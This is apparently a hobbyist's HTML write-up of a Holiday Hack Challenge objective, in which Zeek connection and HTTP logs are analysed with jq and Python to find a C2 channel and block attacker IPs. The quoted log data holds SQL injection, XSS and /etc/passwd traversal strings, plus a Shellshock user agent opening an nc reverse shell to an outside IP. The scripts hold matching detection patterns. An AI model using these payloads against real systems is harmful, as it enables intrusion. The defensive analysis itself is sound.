    I'm pretty sure one of these connections is a malicious C2 channel...
    Do you think you could take a look?
    I hear a lot of C2 channels have very long connection times.
    Please use jq to find the longest connection in this data set.
    We have to kick out any and all grinchy activity!
  </div>
  <div class="hint">
    &xrarr;
    <a href="https://pen-testing.sans.org/blog/2019/12/03/parsing-zeek-json-logs-with-jq-2">Parsing Zeek JSON Logs with JQ</a>
  </div>
  <p><b>conn.log</b> is a huge sequence of JSON Zeek connection logs such as</p>
  <pre>
  {
    "ts": "2019-04-04T20:34:24.698965Z",
    "uid": "CAFvAu2l50Km67tSP5",
    "id.orig_h": "192.168.144.130",
    "id.orig_p": 64277,
    "id.resp_h": "192.168.144.2",
    "id.resp_p": 53,
    "proto": "udp",
    "service": "dns",
    <mark>"duration"</mark>: 0.320463,
    "orig_bytes": 94,
    "resp_bytes": 316,
    "conn_state": "SF",
    "missed_bytes": 0,
    "history": "Dd",
    "orig_pkts": 2,
    "orig_ip_bytes": 150,
    "resp_pkts": 2,
    "resp_ip_bytes": 372
  }
  </pre>
  <p>
    each as a new JSON object. <b>jq</b>, the favoured tool, is a unix command line JSON 
    processor. The C2 in Wunorse's speach stands for <b>command & control</b>, and 
    a C2 channel is used by machines in a botnet to report back to their 
    "minder". 
  </p>
  <p>
    Well, Santa provides! The article on JQ by Joshua Wright hinted at by Wunorse
    pretty much contains the solution to her troubles. The command
  </p>
  <pre>cat conn.log | jq -s 'sort_by(.duration) | reverse | .[0]'</pre>
  <p>
    returns the longest connection from the set of logs. jq is invoked with the 
    aptly named option -s or --slurp, which reads the entire file 
    into a large JSON array before performing any operations. Without it,
    jq would act on each JSON object in conn.log in turn, which is no good
    when sorting. And sort we do, in reverse order of duration, and extract
    the first element of the resulting array. The answer desired by Wunorse 
    is the destination IP (key: "id.resp_h") of this connection:
    <b>13.107.21.200</b>.
  </p>
  <div class="quote">
    <div class="name">Wunorse Openslae:</div>
    That's got to be the one - thanks!<br>
    Hey, you know what? We've got a crisis here.
    You see, Santa's flight route is planned by a complex set of 
    machine learning algorithms which use available weather data.
    All the weather stations are reporting severe weather to Santa's Sleigh. 
    I think someone might be forging intentionally false weather data!
    I'm so flummoxed I can't even remember how to login!<br>
    Hmm... Maybe the Zeek http.log could help us.
    I worry about LFI, XSS, and SQLi in the Zeek log - oh my!
    And I'd be shocked if there weren't some shell stuff in there too.
    I'll bet if you pick through, you can find some naughty data from 
    naughty hosts and block it in the firewall.<br>
    If you find a log entry that definitely looks bad, try pivoting off 
    other unusual attributes in that entry to find more bad IPs.
    The sleigh's machine learning device (SRF) needs most of the 
    malicious IPs blocked in order to calculate a good route.
    Try not to block many legitimate weather station IPs as that 
    could also cause route calculation failure.<br>
    Remember, when looking at JSON data, jq is the tool for you!
  </div>
  <div class="hint">
    &xrarr;
    <div>
      Do you see any 
      <a href="https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion">LFI</a>,
      <a href="https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)">XSS</a>,
      <a href="https://en.wikipedia.org/wiki/Shellshock_(software_bug)">Shellshock</a>, or
      <a href="https://www.owasp.org/index.php/SQL_Injection">SQLi</a>?
    </div>
  </div>

  <h3 id="obj12_2">II) Filter Out Poisoned Sources of Weather Data</h3>
  <p>Time to meet the evil mastermind.</p>
  <img src="img/obj_12/tooth_fairy.png" style="float:right; height:150px; padding-left:10px;">
  <div class="quote">
    <div class="name">The Tooth Fairy:</div>
    I’m the Tooth Fairy, the mastermind behind the plot to destroy the holiday season.
    I hate how Santa is so beloved, but only works one day per year!
    He has all of the resources of the North Pole and the elves to help him too.
    I run a solo operation, toiling year-round collecting deciduous bicuspids 
    and more from children.
    But I get nowhere near the gratitude that Santa gets. He needs to share 
    his holiday resources with the rest of us!
    But, although you found me, you haven’t foiled my plot!
    Santa’s sleigh will NOT be able to find its way.
    I will get my revenge and respect!
    I want my own holiday, National Tooth Fairy Day, to be the most 
    popular holiday on the calendar!!!
  </div>
  <p>No wonder poor Kent Tinseltooth got into trouble!</p>
  <div class="quote">
    <div class="name">Krampus:</div>
    But there’s still time! Solve the final challenge in your 
    badge by blocking the bad IPs at srf.elfu.org and save the 
    holiday season!
  </div>
  <p>
    Easier said than done, Mr. Krampus! We are tasked with identifying a list of IPs 
    to block by looking for attack patterns in the logs of old HTTP requests. The logic 
    behind this approach apears to be:
  </p>
  <ol>
    <li>
      The Tooth Fairy tried (and failed) to hack into Sleigh Route Finder (SRF) API 
      before she managed to get the password location from Kent Tinseltooth.
    </li>
    <li>
      For those hacking attempts she used a variety of IP addresses 
      to cover her tracks, probably via a botnet.
    </li>
    <li>
      Now that she has the password and can access the SRF API legitimately,
      the Tooth Fairy reuses her botnet to poison the weather data.
    </li>
    <li>
      Therefore, the IP addresses of logged attacks and bad weather data will overlap.
    </li>
  </ol>
  <p>
    The first step is to log into the SRF API to see what is going on. Only we cannot,
    because Wunorse has panicked and forgotten her login. Most of the API is access 
    protected by session cookie, poking around just gives a 
    <code>401 - Unauthorized srfsession Cookie</code> response. Available information:
  </p>
  <ul>
    <li>
      Kent Tinseltooth (the elf with the IOT braces) spilled out an important 
      hint when interrogated by the Tooth Fairy: 
      <em>
        Please no, they're testing it at srf.elfu.org using 
        <mark>default creds</mark>, but I don't know more. It's classified.
      </em>
    </li>
    <li>
      According to the SRF manual reconstructed in objective 10, 
      <em>
        The default login credentials should be changed on startup and can be found 
        in the <mark>readme</mark> in the <mark>ElfU Research Labs git repository</mark>.
      </em>
    </li>
  </ul>
  <p>
    But where can the git repository of ElfU Research Labs be found? 
    It is of course not openly accessible, and searching through all previous information
    produced no leads. This leaves the Zeek log file, a long JSON array of 
    HTTP request logs, either GET or POST. A typical entry:
  </p>
  <pre>
  {
    "ts": "2019-10-05T06:51:49-0800",
    "uid": "C7Erxw6CZFJlrkQe3",
    "id.orig_h": "228.75.175.207",
    "id.orig_p": 41278,
    "id.resp_h": "10.20.3.80",
    "id.resp_p": 80,
    "trans_depth": 1,
    "method": "GET",
    "host": "10.20.3.80",
    "uri": "/api/weather?station_id=1626921,1342999",
    "referrer": "-",
    "version": "1.1",
    "user_agent": "Sogou head spider/3.0( http://www.sogou.com/docs/help/webmasters.htm#07)",
    "origin": "-",
    "request_body_len": 0,
    "response_body_len": 926,
    "status_code": 200,
    "status_msg": "OK",
    "info_code": "-",
    "info_msg": "-",
    "tags": "(empty)",
    "username": "-",
    "password": "-",
    "proxied": "-",
    "orig_fuids": "-",
    "orig_filenames": "-",
    "orig_mime_types": "-",
    "resp_fuids": "FbuO1h1tuN8AT1n3wc",
    "resp_filenames": "-",
    "resp_mime_types": "application/json"
  }</pre>
  <p>
    The idea is to check the URIs of successful HTTP requests to srf.elfu.org in order 
    to find paths which are not access protected. JQ is a great tool for analysing 
    JSON files, but I find python scripts much simpler to use if available:
  </p>
  <pre class="prettyprint lang-python">
  import json

  with open("http.log", "r") as fh:
      logs = json.load(fh)
  good_uris = set([log["uri"] for log in logs if log["status_code"] == 200])
  print("Successful URIs:", len(good_uris))
  for uri in good_uris:
      if not uri.startswith("/api/weather"):
          print(uri)    
  </pre>
  <p>
    The full list of good URIs has 19682 entries, but most of them are calls to 
    <code>/api/weather</code> with different parameters. 
    Excluding those leaves 45 candidates:
  </p>
  <pre>
  /
  /alert.html
  /santa.html
  /index.html
  /api/stations?station_id=1' UNION SELECT 1,'automatedscanning','5e0bd03bec244039678f2b955a2595aa','',0,'',''/*&password=MoAOWs
  /api/stations?station_id=&lt;script&gt;alert('automatedscanning')&lt;/script&gt;
  /api/stations?station_id=|cat /etc/passwd|
  /logout?id=1' UNION SELECT null,null,'autosc','autoscan',null,null,null,null,null,null,null,null/*
  /logout?id=1' UNION/**/SELECT 1223209983/*
  /vendor/jquery/jquery.min.js
  /api/login?id=1' UNION/**/SELECT/**/0,1,concat(2037589218,0x3a,323562020),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
  /apidocs.pdf
  /api/login?id=cat /etc/passwd||
  /js/Morph.js
  /api/stations
  /api/login?id=.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./etc/passwd
  /api/stations?station_id=&lt;script&gt;alert(\"automatedscanning\")&lt;/script&gt;
  /api/login
  /js/library-g.js
  /vendor/bootstrap/js/bootstrap.bundle.min.js
  /logout?id=&lt;script&gt;alert(1400620032)&lt;/script&gt;&ref_a=avdsscanning\"&gt;&lt;script&gt;alert(1536286186)&lt;/script&gt;
  /css/main.css
  /img/goodweather.png
  /vendor/jquery-easing/jquery.easing.min.js
  /css/alt.css
  /api/measurements
  /css/weathermap.css
  /js/weathermap.js
  /map.html
  /img/logo_zoomed2.PNG
  /js/ipaddr.js
  /logout
  /img/badweather.png
  /api/stations?station_id=1' UNION SELECT 1,2,'automatedscanning',4,5,6,7,8,9,10,11,12,13/*
  <mark>/README.md</mark>
  /js/freelancer.min.js
  /vendor/fontawesome-free/webfonts/fa-solid-900.woff2
  /api/measurements?station_id=&lt;script&gt;alert(60602325)&lt;/script&gt;
  /js/CustomEase.js
  /api/login?id=/../../../../../../../../../etc/passwd
  /home.html
  /api/firewall
  /vendor/fontawesome-free/css/all.min.css
  /api/measurements?station_id=1' UNION SELECT 1434719383,1857542197 --
  /css/freelancer.min.css
  </pre>
  <img src="img/obj_12/badweather.png" style="float:right; height:70px; padding-left:10px;">
  <p>
    Evidently, the tooth fairy has been busy! Many of the URIs show exploit patterns
    for SQL injection, path traversal etc which will be useful later. In the remainder,
    <code>/README.md</code> stands out. Could this be 
    the git repository readme containing the default password? 
    Thankfully, this URI is not blocked, and 
    <a href="https://srf.elfu.org/README.md">https://srf.elfu.org/README.md</a> 
    leads to a download:
  </p>
  <pre>
  # Sled-O-Matic - Sleigh Route Finder Web API

  ### Installation

  ```
  sudo apt install python3-pip
  sudo python3 -m pip install -r requirements.txt
  ```

  #### Running:

  `python3 ./srfweb.py`

  #### Logging in:

  You can login using the <mark>default admin pass</mark>:

  `<mark>admin 924158F9522B3744F5FCD4D10FAC4356</mark>`

  However, it's recommended to change this in the sqlite db to something custom.   
  </pre>
  <p>
    Success! With these credentials, I was able to log in and get to 
    <a href="https://srf.elfu.org/home.html">https://srf.elfu.org/home.html</a>.
    and access the api documentation for entering weather data, a really scary 
    looking weather weather map and the firewall configuration page. Other URIs 
    from the good list above also become accessible, but show nothing new.
  </p>
  <img src="img/obj_12/api_bad_weather.png" width="500px" class="centered">
  <p>
    Let's do something about all this bad weather and block some evil IPs. Some 
    URI manipulations were already visible in the list of successful URIs above. 
    Other log entries can be tested for manipulations by collecting and printing
    all appearing values, for example from the python prompt with
  </p>
  <pre class="prettyprint lang-python">
  &gt;&gt;&gt; set([log["username"] for log in logs])   
  </pre>
  <p>
    It turns out that 4 log elements show manipulations, the others appear clean.
    Examples and search terms to identify the manipulation:
  </p>
  <ul>
    <li>
      "host":
      <ul>
        <li>
          Cross-site scripting &rarr; look for <mark><code>&lt;script&gt;</code></mark><br>
          <code>"host": '&lt;script&gt;alert(\\"automatedscanning\\")&lt;/script&gt;&lt;img src=\\"'</code>
        </li>
      </ul>
    </li>
    <li>
      "uri":
      <ul>
        <li>
          Cross-site scripting &rarr; look for <mark><code>&lt;script&gt;</code></mark><br>
          <code>"uri": /api/weather?station_id=&lt;script&gt;alert(1)&lt;/script&gt;.html</code>
        </li>
        <li>
          SQL injection &rarr; look for <mark><code>'</code></mark><br>
          <code>"uri": /api/weather?station_id=1' UNION/**/SELECT 302590057/*</code>
        </li>
        <li>
          Local file inclusion &rarr; look for <mark><code>/.. or passwd</code></mark><br>
          <code>"uri": '/api/login?id=/../../../../../../../../../etc/passwd'</code>
        </li>
      </ul>
    </li>
    <li>
      "user_agent":
      <ul>
        <li>
          SQL injection &rarr; look for <mark><code>'</code></mark><br>
          <code>"user_agent": "1' UNION/**/SELECT/**/1,2,434635502,4/*&blog=1"</code>
        </li>
        <li>
          Remote command execution &rarr; look for <mark><code>()</code></mark><br>
          <code>"user_agent": "() { :; }; /bin/bash -c '/bin/nc 55535 220.132.33.81 -e /bin/bash'"</code>
        </li>
      </ul>
    </li>
    <li>
      "username":
      <ul>
        <li>
          SQL injection &rarr; look for <mark><code>'</code></mark><br>
          <code>"username": "' or '1=1"</code>
        </li>
      </ul>
    </li>
  </ul>
  <p>
    The python script below searches through all logs and collects the source 
    IP addresses of requests matching the above criteria.
  </p>
  <pre class="prettyprint lang-python">
  import json

  with open("http.log", "r") as fh:
      logs = json.load(fh)
  
  evil_ip = set()
  # Catch suspicious looking headers
  for log in logs:
      uri = log["uri"]
      host = log["host"]
      user_agent = log["user_agent"]
      username = log["username"]
      if (uri.find('&lt;script&gt;') >= 0           # URI: XXS
              or uri.find("'") >= 0           # URI: SQLi
              or uri.find('/..') >= 0         # URI: LFI
              or uri.find('passwd') >= 0      # URI: LFI
              or host.find('&lt;script&gt;') >= 0   # Host: XXS
              or user_agent.find('()') >= 0   # UserAgent: remote command execution
              or user_agent.find("'") >= 0    # UserAgent: SQLi
              or username.find("'") >= 0):    # UserName: SQLi
          evil_ip.add(log["id.orig_h"])
          print("Evil HTTP headers:", len(evil_ip))    
  print(', '.join(list(evil_ip)))    
  </pre>
  <p>
    'Only' 67 evil IP addresses are identified, not good enough! Trying to block 
    these IPs in the SRF api firewall still results in a failed route calculation, 
    ans Santa crashing into a dark cloud. As suggested by Wunorse Openslae, we have
    to do some pivoting to find more IPs to block. The only promising candidate 
    is the user agent field. If we collect the user agents used by the malicious 
    requests, many of them look unusual: some have typoes indicating sloppy 
    hand-construction, others are fantasy names or even dead giveaways 
    (e.g. metasploit). 
  </p>
  <p>
    The script below compiles the compromised user agent names,
    excluding those which are directly malicious (they are already accounted for).
    It then collects the originating IP of all requests using those names,
    and prints the number of occurences. 
  </p>
  <pre class="prettyprint lang-python">
  import json

  with open("http.log", "r") as fh:
      logs = json.load(fh)
  
  evil_ip = set()
  suspicious_ua = set()
  
  # Catch suspicious looking headers
  for log in logs:
      uri = log["uri"]
      host = log["host"]
      user_agent = log["user_agent"]
      username = log["username"]
      if (uri.find('&lt;script&gt;') >= 0           # URI: XXS
              or uri.find("'") >= 0           # URI: SQLi
              or uri.find('/..') >= 0         # URI: LFI
              or uri.find('passwd') >= 0      # URI: LFI
              or host.find('&lt;script&gt;') >= 0   # Host: XXS
              or user_agent.find('()') >= 0   # UserAgent: remote command execution
              or user_agent.find("'") >= 0    # UserAgent: SQLi
              or username.find("'") >= 0):    # UserName: SQLi
          evil_ip.add(log["id.orig_h"])
          suspicious_ua.add(user_agent)
  print("Evil HTTP headers:", len(evil_ip))
  
  # Identify strange looking user agents
  for ua in suspicious_ua:
      # exclude manipulated User Agents: they are already counted
      if ua.find('()') >= 0 or ua.find("'") >= 0:
          continue
      # count number of IP addresses with this UA
      ua_ip = set()
      for log in logs:
          if log["user_agent"] == ua:
              ua_ip.add(log["id.orig_h"])
      print(len(ua_ip), ua)
      # exclude UAs with many hits, as they are probably legit
      if len(ua_ip) > 8:
          continue
      evil_ip.update(ua_ip)
  
  print("Evil IP addresses:", len(evil_ip))
  print(', '.join(list(evil_ip)))
  </pre>
  The result: a list of 52 suspects.
  <pre>
      1 Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/600.7.12 (KHTML, like Gecko) Version/8.0.7 Safari/600.7.12
      11 Mozilla/5.0 (Windows; U; Windows NT 5.2; sk; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15
      13 Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.100 Safari/534.30
      2 Mozilla/4.0 (compatible; Metasploit RSPEC)
      2 CholTBAgent
      11 Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; fr) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.22
      2 Mozilla/4.0 (compatible;MSIE 7.0;Windows NT 6.
      2 Wget/1.9+cvs-stable (Red Hat modified)
      1 Mozilla/5.0 (iPhone; CPU iPhone OS 10_3 like Mac OS X) AppleWebKit/603.1.23 (KHTML, like Gecko) Version/10.0 Mobile/14E5239e Safari/602.1
      2 Mozilla/5.0 (compatible; Goglebot/2.1; +http://www.google.com/bot.html)
      2 Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) ApleWebKit/525.13 (KHTML, like Gecko) chrome/4.0.221.6 safari/525.13
      2 Mozilla/5.0 WinInet
      2 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tridents/4.0)
      2 Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) gecko/20100401 Firefox/3.6.1 (.NET CLR 3.5.30731
      2 Mozilla/5.0 (Windows NT 6.1; WOW62; rv:53.0) Gecko/20100101 Chrome /53.0
      2 Mozilla/4.0 (compatibl; MSIE 7.0; Windows NT 6.0; Trident/4.0; SIMBAR={7DB0F6DE-8DE7-4841-9084-28FA914B0F2E}; SLCC1; .N
      2 Mozilla/4.0 (compatible; MSIE 6.1; Windows NT6.0)
      10 Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.8) Gecko/20071004 Firefox/2.0.0.8 (Debian-2.0.0.8-1)
      2 Mozilla/5.0 Windows; U; Windows NT5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.1 (.NET CLR 3.5.30729)
      2 Mozilla4.0 (compatible; MSSIE 8.0; Windows NT 5.1; Trident/5.0)
      1 Mozilla/5.0 (Linux; Android 5.1.1; Nexus 5 Build/LMY48B; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/43.0.2357.65 Mobile Safari/537.36
      2 Mozilla/4.0 (compatible; MSIE6.0; Windows NT 5.1)
      2 Mozilla/4.0 (compatible; MSIE 8.0; Windows MT 6.1; Trident/4.0; .NET CLR 1.1.4322; )
      2 Mozilla/5.0 (Windows NT 5.1 ; v.)
      2 Opera/8.81 (Windows-NT 6.1; U; en)
      9 Mozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9.0.18) Gecko/2010021501 Ubuntu/9.04 (jaunty) Firefox/3.0.18
      2 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NETS CLR  1.1.4322)
      17 Mozilla/5.0 (X11; U; Linux i686; it; rv:1.9.0.5) Gecko/2008121711 Ubuntu/9.04 (jaunty) Firefox/3.0.5
      1 Mozilla/5.0 (Linux; U; Android 4.1.1; en-gb; Build/KLP) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
      2 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT5.1)
      2 Mozilla/4.0 (compatible; MSIE 8.0; Windows_NT 5.1; Trident/4.0)
      2 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; AntivirXP08; .NET CLR 1.1.4322)
      2 Mozilla/4.0 (compatible; MSIE 8.0; Window NT 5.1)
      19 Mozilla/4.0 (compatible; MSIE 5.13; Mac_PowerPC)
      10 Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.4.15451
      2 Mozilla/4.0(compatible; MSIE 666.0; Windows NT 5.1
      2 Mozilla/4.0 (compatible; MSIE 7.0; Windos NT 6.0)
      2 Mozilla/4.0 (compatible; MSIEE 7.0; Windows NT 5.1)
      2 RookIE/1.0
      2 Mozilla/5.0 (Windows NT 10.0;Win64;x64)
      2 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
      2 Mozilla/4.0 (compatible;MSIe 7.0;Windows NT 5.1)
      1 Mozilla/5.0 (iPhone; CPU iPhone OS 10_3 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) CriOS/56.0.2924.75 Mobile/14E5239e Safari/602.1
      1 Mozilla/5.0 (Linux; Android 4.4; Nexus 5 Build/_BuildID_) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Mobile Safari/537.36
      2 Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Tridents/4.0; .NET CLR 1.1.4322; PeoplePal 7.0; .NET CLR 2.0.50727)
      2 Mozilla/5.0 (compatible; MSIE 10.0; W1ndow NT 6.1; Trident/6.0)
      2 Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 500.0)
      2 Mozilla/4.0 (compatible MSIE 5.0;Windows_98)
      2 Mozilla/4.0 (compatible; MSIE 6.a; Windows NTS)
      2 HttpBrowser/1.0
      1 Mozilla/5.0 (Linux; Android 4.0.4; Galaxy Nexus Build/IMM76B) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.133 Mobile Safari/535.19
      13 Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9b3) Gecko/2008020514 Opera 9.5
  </pre>
  <p>
    Blocking all associated IP addresses would be too much (207), the firewall does not
    even let us try so many. The honest approach would be to look at all user agents in 
    the list and mark the suspicious ones by hand, but this would be far too much effort.
    So, I simply assumed that user agents with more than 8 hits are probably legitimate,
    and excluded them from the collection (implemented in the script above). This results
    in a list of 103 blockworthy IP addresses. Printing them as csv and feeding them to 
    the SRF api firewall under deny results in a much better looking weather map, a 
    successful route calculation and a happy Santa. 
  </p>
  <img src="img/obj_12/api_good_weather.png" width="500px" class="centered">
  <img src="img/obj_12/firewall_success.png" width="700px" class="centered">
  <div class="answer"><b>Answer</b>: 0807198508261964</div>

  <h2 id="epilogue">Epilogue</h2>
  <p>
    Hooray, christmas is saved!! Solving the final objective freed up the path
    to the bell tower, where a happy Santa, a rather bloated Krampus and a pissed 
    off Tooth Fairy are gathered. One can even spot an ominous note in the corner,
    hinting at fun to be had in a years time.
  </p>
  <div class="quote"> 
    <div class="name">Santa:</div>
    You did it! Thank you! You uncovered the sinister plot to destroy 
    the holiday season! Through your diligent efforts, we’ve brought 
    the Tooth Fairy to justice and saved the holidays!<br>
    Ho Ho Ho!<br>
    The more I laugh, the more I fill with glee. And the more the glee,
    The more I'm a merrier me!<br>
    Merry Christmas and Happy Holidays.
  </div>
  <p></p>
  <div class="quote"> 
    <div class="name">Krampus:</div>
    Congratulations on a job well done!
    Oh, by the way, I won the Frido Sleigh contest.
    I got 31.8% of the prizes, though I'll have to figure that out.
  </div>
  <p></p>
  <div class="quote"> 
    <div class="name">The Tooth Fairy:</div>
    You foiled my dastardly plan! I’m ruined!
    And I would have gotten away with it too, if it weren't 
    for you meddling kids!
  </div>
  <p>
    Many thanks to Ed Skoudis and all the makers of this HHC for the incredible length 
    they went to in order to create a memorable, albeit sleepless christmas 
    holiday. With so many pros around, it was a great feeling to crack this tough nut
    as a mere hobbyist, even though I imagine there are many eggs left to be discovered. 
    I learned a huge amount about the blue side of things, which was completely new
    to me: Event logging and analysis, which traces an attacker leaves, and how to read them. 
    My favourite topics were:
  </p>
  <ol>
    <li>Optical key cutting</li>
    <li>SQLmap</li>
    <li>Splunk / Graylog</li>
    <li>PowerShell tricks</li> 
  </ol>
  <p>
    Hope to be back next year!
  </p>
  <img src="img/epilogue/happy_santa.png" class="centered">
  <img src="img/epilogue/jack_frost.png" height="200px" class="centered">
  <p>
    Whose grounds these are, I think I know<br>
    His home is in the North Pole though<br>
    He will not mind me traipsing here<br>
    To watch his students learn and grow<br><br>
    Some other folk might stop and sneer<br>
    "Two turtle doves, this man did rear?"<br>
    I'll find the birds, come push or shove<br>
    Objectives given: I'll soon clear<br><br>
    Upon discov'ring each white dove,<br>
    The subject of much campus love,<br>
    I find the challenges are more<br>
    Than one can count on woolen glove.<br><br>
    Who wandered thus through closet door?<br>
    Ho ho, what's this? What strange boudoir!<br>
    Things here cannot be what they seem<br>
    That portal's more than clothing store.<br><br>
    Who enters contests by the ream<br>
    And lives in tunnels meant for steam?<br>
    This Krampus bloke seems rather strange<br>
    And yet I must now join his team...<br><br>
    Despite this fellow's funk and mange<br>
    My fate, I think, he's bound to change.<br>
    What is this contest all about?<br>
    His victory I shall arrange!<br><br>
    To arms, my friends! Do scream and shout!<br>
    Some villain targets Santa's route!<br>
    What scum - what filth would seek to end<br>
    Kris Kringle's journey while he's out?<br><br>
    Surprised, I am, but "shock" may tend<br>
    To overstate and condescend.<br>
    'Tis little more than plot reveal<br>
    That fairies often do extend<br><br>
    And yet, despite her jealous zeal,<br>
    My skills did win, my hacking heal!<br>
    No dental dealer can so keep<br>
    Our red-clad hero in ordeal!<br><br>
    This Christmas must now fall asleep,<br>
    But next year comes, and troubles creep.<br>
    And Jack Frost hasn't made a peep,<br>
    And Jack Frost hasn't made a peep...
  </p>  
</div>
</body>
</html>